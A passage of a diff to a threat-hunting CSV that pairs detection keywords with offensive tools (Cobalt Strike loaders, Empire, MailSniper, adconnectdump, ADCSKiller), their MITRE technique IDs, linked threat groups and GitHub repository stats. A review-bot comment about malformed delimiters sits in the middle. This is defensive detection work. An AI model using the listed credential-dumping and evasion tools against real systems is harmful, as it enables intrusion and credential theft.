& Spoofing","https://github.com/fkasler/cuddlephish","1","0","N/A","10","2","152","10","2023-09-06T12:25:08Z","2023-08-02T14:30:41Z" "*AAB4D641-C310-4572-A9C2-6D12593AB28E*","offensive_tool_keyword","SharpEfsPotato","Local privilege escalation from SeImpersonatePrivilege using EfsRpc.","T1548.002 - T1134.002","TA0004 - TA0006","N/A","N/A","Privilege Escalation","https://github.com/bugch3ck/SharpEfsPotato","1","0","N/A","10","3","241","40","2022-10-17T12:35:06Z","2022-10-17T12:20:47Z" 
@@ -6938,12 +7081,12 @@ "*aboul3la*","offensive_tool_keyword","Github Username","Github username of pentester known for enumeration tools","N/A","N/A","N/A","N/A","Information Gathering","https://github.com/aboul3la","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*AbuseGithubAPI*.cpp*","offensive_tool_keyword","GithubC2","Github as C2","T1095 - T1071.001","TA0011","N/A","N/A","C2","https://github.com/TheD1rkMtr/GithubC2","1","0","N/A","10","10","115","29","2023-08-02T02:26:05Z","2023-02-15T00:50:59Z" "*AbuseGithubAPI*.exe*","offensive_tool_keyword","GithubC2","Github as C2","T1095 - T1071.001","TA0011","N/A","N/A","C2","https://github.com/TheD1rkMtr/GithubC2","1","0","N/A","10","10","115","29","2023-08-02T02:26:05Z","2023-02-15T00:50:59Z" -"*ACBypassTest*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Invoke-FodHelperBypass.ps1","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*ACBypassTest*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Invoke-FodHelperBypass.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*Accenture/Spartacus*","offensive_tool_keyword","Spartacus","Spartacus DLL/COM Hijacking Toolkit","T1574.001 - T1055.001 - T1027.002","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/Accenture/Spartacus","1","1","N/A","10","9","826","104","2023-09-02T00:48:42Z","2022-10-28T09:00:35Z" -"*AccessTokenImpersonationAccount*","offensive_tool_keyword","MailSniper","MailSniper is a penetration testing tool for searching through email in a Microsoft Exchange environment for specific terms (passwords. insider intel. network architecture information. etc.). It can be used as a non-administrative user to search their own email. 
or by an administrator to search the mailboxes of every user in a domain.","T1114 - T1134.002","TA0005 - TA0006","N/A","N/A","Credential Access","https://github.com/dafthack/MailSniper/blob/master/MailSniper.ps1","1","1","N/A","N/A","10","2625","554","2022-10-20T08:13:33Z","2016-09-08T00:36:51Z" +"*AccessTokenImpersonationAccount*","offensive_tool_keyword","MailSniper","MailSniper is a penetration testing tool for searching through email in a Microsoft Exchange environment for specific terms (passwords. insider intel. network architecture information. etc.). It can be used as a non-administrative user to search their own email. or by an administrator to search the mailboxes of every user in a domain.","T1114 - T1134.002","TA0005 - TA0006","N/A","N/A","Credential Access","https://github.com/dafthack/MailSniper/blob/master/MailSniper.ps1","1","1","N/A","N/A","10","2626","554","2022-10-20T08:13:33Z","2016-09-08T00:36:51Z" "*Accounts with extra permissions.txt*","offensive_tool_keyword","ACLight","A tool for advanced discovery of Privileged Accounts - including Shadow Admins.","T1087 - T1003 - T1208","TA0001 - TA0006 - TA0008","N/A","N/A","AD Enumeration","https://github.com/cyberark/ACLight","1","0","N/A","7","8","730","150","2019-09-09T06:48:45Z","2017-05-17T09:29:41Z" -"*AceLdr.*.bin*","offensive_tool_keyword","cobaltstrike","Cobalt Strike UDRL for memory scanner evasion.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - 
T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/kyleavery/AceLdr","1","1","N/A","10","10","712","123","2023-09-28T19:47:03Z","2022-08-11T00:06:09Z" -"*AceLdr.zip*","offensive_tool_keyword","cobaltstrike","Cobalt Strike UDRL for memory scanner evasion.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/kyleavery/AceLdr","1","1","N/A","10","10","712","123","2023-09-28T19:47:03Z","2022-08-11T00:06:09Z" +"*AceLdr.*.bin*","offensive_tool_keyword","cobaltstrike","Cobalt Strike UDRL for memory scanner evasion.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - 
T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/kyleavery/AceLdr","1","1","N/A","10","10","714","123","2023-09-28T19:47:03Z","2022-08-11T00:06:09Z" +"*AceLdr.zip*","offensive_tool_keyword","cobaltstrike","Cobalt Strike UDRL for memory scanner evasion.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - 
Chimera - APT29","C2","https://github.com/kyleavery/AceLdr","1","1","N/A","10","10","714","123","2023-09-28T19:47:03Z","2022-08-11T00:06:09Z" "*acf7a8a9-3aaf-46c2-8aa8-2d12d7681baf*","offensive_tool_keyword","SharpNoPSExec","Get file less command execution for lateral movement.","T1021.006 - T1059.003 - T1105","TA0008 - TA0002 - TA0011","N/A","N/A","Lateral Movement","https://github.com/juliourena/SharpNoPSExec","1","0","N/A","10","6","567","85","2022-06-03T10:32:55Z","2021-04-24T22:02:38Z" "*acheron-master.zip*","offensive_tool_keyword","acheron","indirect syscalls for AV/EDR evasion in Go assembly","T1055.012 - T1059.001 - T1059.003","TA0005 - TA0002 - TA0003","N/A","N/A","Defense Evasion","https://github.com/f1zm0/acheron","1","1","N/A","N/A","3","244","31","2023-06-13T19:20:33Z","2023-04-07T10:40:33Z" "*ACLight.ps1*","offensive_tool_keyword","ACLight","A tool for advanced discovery of Privileged Accounts - including Shadow Admins.","T1087 - T1003 - T1208","TA0001 - TA0006 - TA0008","N/A","N/A","AD Enumeration","https://github.com/cyberark/ACLight","1","1","N/A","7","8","730","150","2019-09-09T06:48:45Z","2017-05-17T09:29:41Z" 
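Review bot: The `metadata_groups_name` value on the refreshed `*ACBypassTest*` row still ends in a dangling separator (`... Indrik Spider - Turla - `), so any consumer that splits this field on ` - ` would get an empty trailing group name; this commit changes only the star count and leaves it in place. The same kind of delimiter defect is on the `*acronis_trueimage_xpc_privesc*` row in the next hunk, where `metadata_tool_techniques` contains `T1204 -T1210` with no space after the hyphen, which would presumably not split into two technique IDs. I would change these to `... Indrik Spider - Turla` and `T1204 - T1210 - T1218`. The Empire technique list on the same row also lists `T1106` twice. Because these rows feed detection content, a lint step that checks each ` - `-separated field for empty or malformed tokens before the metadata refresh is committed would catch these.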
@@ -6960,14 +7103,14 @@ "*acltoolkit.git*","offensive_tool_keyword","acltoolkit","acltoolkit is an ACL abuse swiss-army knife. It implements multiple ACL abuses","T1222.001 - T1222.002 - T1046","TA0007 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/zblurx/acltoolkit","1","1","N/A","N/A","2","108","14","2023-02-03T10:27:45Z","2022-01-12T22:45:49Z" "*acltoolkit-ad*","offensive_tool_keyword","acltoolkit","acltoolkit is an ACL abuse swiss-army knife. It implements multiple ACL abuses","T1222.001 - T1222.002 - T1046","TA0007 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/zblurx/acltoolkit","1","1","N/A","N/A","2","108","14","2023-02-03T10:27:45Z","2022-01-12T22:45:49Z" "*acltoolkit-main*","offensive_tool_keyword","acltoolkit","acltoolkit is an ACL abuse swiss-army knife. It implements multiple ACL abuses","T1222.001 - T1222.002 - T1046","TA0007 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/zblurx/acltoolkit","1","1","N/A","N/A","2","108","14","2023-02-03T10:27:45Z","2022-01-12T22:45:49Z" -"*acronis_trueimage_xpc_privesc*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" +"*acronis_trueimage_xpc_privesc*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" "*AcroRd32.exe FUZZ*","offensive_tool_keyword","litefuzz","A multi-platform fuzzer for poking at userland binaries and servers","T1587.004","TA0009","N/A","N/A","Exploitation tools","https://github.com/sec-tools/litefuzz","1","0","N/A","N/A","1","54","7","2023-07-16T00:15:41Z","2021-09-17T14:40:07Z" "*Action: Locating SCCM Management Servers*","offensive_tool_keyword","MalSCCM","This tool allows you to abuse local or remote SCCM servers to deploy malicious applications to hosts they manage","T1072 - T1059.005 - T1090","TA0008 - TA0002 - TA0011","N/A","N/A","Exploitation tools","https://github.com/nettitude/MalSCCM","1","0","N/A","10","3","223","34","2023-09-28T17:29:50Z","2022-05-04T08:27:27Z" "*Action: Locating SCCM Servers in Registry*","offensive_tool_keyword","MalSCCM","This tool allows you to abuse local or remote SCCM servers to deploy malicious applications to hosts they manage","T1072 - T1059.005 - T1090","TA0008 - TA0002 - TA0011","N/A","N/A","Exploitation tools","https://github.com/nettitude/MalSCCM","1","0","N/A","10","3","223","34","2023-09-28T17:29:50Z","2022-05-04T08:27:27Z" "*action=SchTaskCOMHijack *","offensive_tool_keyword","SharpStay","SharpStay - .NET Persistence","T1031 - T1053 - T1059 - T1060 - T1063 - T1120 - T1123","TA0003 - TA0008 - TA0011","N/A","N/A","POST Exploitation tools","https://github.com/0xthirteen/SharpStay","1","0","N/A","10","5","416","95","2022-09-12T15:39:58Z","2020-01-24T22:22:07Z" "*activedirectory/pwns.go*","offensive_tool_keyword","adalanche","Active Directory ACL 
Visualizer and Explorer - who's really Domain Admin?","T1484 - T1069.002","TA0007 - TA0009","N/A","N/A","AD Enumeration","https://github.com/lkarlslund/Adalanche","1","1","N/A","N/A","10","1202","119","2023-06-20T13:02:30Z","2020-10-07T10:07:22Z" -"*activeScan++.py*","offensive_tool_keyword","ActiveScanPlusPlus","ActiveScan++ extends Burp Suite's active and passive scanning capabilities. Designed to add minimal network overhead. it identifies application behaviour that may be of interest to advanced testers","T1583 - T1595 - T1190","TA0001 - TA0002 - TA0008","N/A","N/A","Network Exploitation tools","https://github.com/albinowax/ActiveScanPlusPlus","1","1","N/A","7","6","568","192","2022-11-15T13:47:31Z","2014-06-23T10:04:13Z" -"*AD Privesc Automation*","offensive_tool_keyword","autobloody","Tool to automatically exploit Active Directory privilege escalation paths shown by BloodHound","T1078 - T1078.003 - T1021 - T1021.006 - T1076.001","TA0005 - TA0001 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/CravateRouge/autobloody","1","0","N/A","10","4","330","38","2023-09-01T06:41:34Z","2022-09-07T13:34:30Z" +"*activeScan++.py*","offensive_tool_keyword","ActiveScanPlusPlus","ActiveScan++ extends Burp Suite's active and passive scanning capabilities. Designed to add minimal network overhead. 
it identifies application behaviour that may be of interest to advanced testers","T1583 - T1595 - T1190","TA0001 - TA0002 - TA0008","N/A","N/A","Network Exploitation tools","https://github.com/albinowax/ActiveScanPlusPlus","1","1","N/A","7","6","568","191","2022-11-15T13:47:31Z","2014-06-23T10:04:13Z" +"*AD Privesc Automation*","offensive_tool_keyword","autobloody","Tool to automatically exploit Active Directory privilege escalation paths shown by BloodHound","T1078 - T1078.003 - T1021 - T1021.006 - T1076.001","TA0005 - TA0001 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/CravateRouge/autobloody","1","0","N/A","10","4","330","38","2023-10-04T14:40:59Z","2022-09-07T13:34:30Z" "*ad_dns_dump.txt*","offensive_tool_keyword","adhunt","Tool for exploiting Active Directory Enviroments - enumeration","T1018 - T1087 - T1087.002 - T1069 - T1069.002","TA0007 - TA0003 - TA0001","N/A","N/A","AD Enumeration","https://github.com/karendm/ADHunt","1","1","N/A","7","1","41","8","2023-08-10T18:55:39Z","2023-06-20T13:24:10Z" "*AD_Enumeration_Hunt.ps1*","offensive_tool_keyword","AD_Enumeration_Hunt","This repository contains a collection of PowerShell scripts and commands that can be used for Active Directory (AD) penetration testing and security assessment","T1018 - T1003 - T1033 - T1087 - T1069 - T1046 - T1069.002 - T1047 - T1083","TA0001 - TA0007 - TA0005 - TA0002 - TA0003","N/A","N/A","AD Enumeration","https://github.com/alperenugurlu/AD_Enumeration_Hunt","1","1","N/A","7","1","79","16","2023-08-05T06:10:26Z","2023-08-05T05:16:57Z" "*AD_Enumeration_Hunt-alperen_ugurlu_hack*","offensive_tool_keyword","AD_Enumeration_Hunt","This repository contains a collection of PowerShell scripts and commands that can be used for Active Directory (AD) penetration testing and security assessment","T1018 - T1003 - T1033 - T1087 - T1069 - T1046 - T1069.002 - T1047 - T1083","TA0001 - TA0007 - TA0005 - TA0002 - TA0003","N/A","N/A","AD 
Enumeration","https://github.com/alperenugurlu/AD_Enumeration_Hunt","1","1","N/A","7","1","79","16","2023-08-05T06:10:26Z","2023-08-05T05:16:57Z" 
@@ -6979,18 +7122,18 @@ "*adalanche-*.exe*","offensive_tool_keyword","adalanche","Active Directory ACL Visualizer and Explorer - who's really Domain Admin?","T1484 - T1069.002","TA0007 - TA0009","N/A","N/A","AD Enumeration","https://github.com/lkarlslund/Adalanche","1","1","N/A","N/A","10","1202","119","2023-06-20T13:02:30Z","2020-10-07T10:07:22Z" "*Adalanche.git*","offensive_tool_keyword","adalanche","Active Directory ACL Visualizer and Explorer - who's really Domain Admin?","T1484 - T1069.002","TA0007 - TA0009","N/A","N/A","AD Enumeration","https://github.com/lkarlslund/Adalanche","1","1","N/A","N/A","10","1202","119","2023-06-20T13:02:30Z","2020-10-07T10:07:22Z" "*adalanche-collector*","offensive_tool_keyword","adalanche","Active Directory ACL Visualizer and Explorer - who's really Domain Admin?","T1484 - T1069.002","TA0007 - TA0009","N/A","N/A","AD Enumeration","https://github.com/lkarlslund/Adalanche","1","1","N/A","N/A","10","1202","119","2023-06-20T13:02:30Z","2020-10-07T10:07:22Z" -"*ADCollector.exe*","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1076 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","1885","285","2023-09-23T03:34:27Z","2020-06-05T12:50:00Z" -"*adconnectdump.py*","offensive_tool_keyword","adconnectdump","Dump Azure AD Connect credentials for Azure AD and Active Directory","T1003.004 - T1059.001 - T1082","TA0006 - TA0002 - TA0007","N/A","N/A","Credential Access","https://github.com/fox-it/adconnectdump","1","1","N/A","10","6","506","84","2023-08-21T00:00:08Z","2019-04-09T07:41:42Z" -"*adconnectdump-master*","offensive_tool_keyword","adconnectdump","Dump Azure AD Connect credentials for Azure AD and Active Directory","T1003.004 - T1059.001 - T1082","TA0006 - TA0002 - TA0007","N/A","N/A","Credential Access","https://github.com/fox-it/adconnectdump","1","1","N/A","10","6","506","84","2023-08-21T00:00:08Z","2019-04-09T07:41:42Z" -"*adcs_enum.*","offensive_tool_keyword","cobaltstrike","Situational Awareness commands implemented using Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - 
T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/CS-Situational-Awareness-BOF","1","1","N/A","10","10","964","172","2023-09-22T15:51:55Z","2020-07-15T16:21:18Z" -"*adcs_enum_com.*","offensive_tool_keyword","cobaltstrike","Situational Awareness commands implemented using Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/CS-Situational-Awareness-BOF","1","1","N/A","10","10","964","172","2023-09-22T15:51:55Z","2020-07-15T16:21:18Z" -"*adcs_enum_com2.*","offensive_tool_keyword","cobaltstrike","Situational Awareness commands implemented using Beacon Object Files","T1548.002 - T1548.003 - 
T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/CS-Situational-Awareness-BOF","1","1","N/A","10","10","964","172","2023-09-22T15:51:55Z","2020-07-15T16:21:18Z" -"*ADCS_Maybe_ESC8_HTTPS_Vulnerable.txt*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","2960","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" -"*adcsattack.py*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. 
SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11786","3291","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" -"*adcskiller.py*","offensive_tool_keyword","ADCSKiller","ADCSKiller is a Python-based tool designed to automate the process of discovering and exploiting Active Directory Certificate Services (ADCS) vulnerabilities. It leverages features of Certipy and Coercer to simplify the process of attacking ADCS infrastructure","T1552.004 - T1003.003 - T1114.002","TA0006 - TA0003 - TA0005","N/A","N/A","Exploitation tools","https://github.com/grimlockx/ADCSKiller","1","1","N/A","N/A","6","535","53","2023-05-19T17:36:37Z","2023-05-19T06:51:41Z" +"*ADCollector.exe*","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
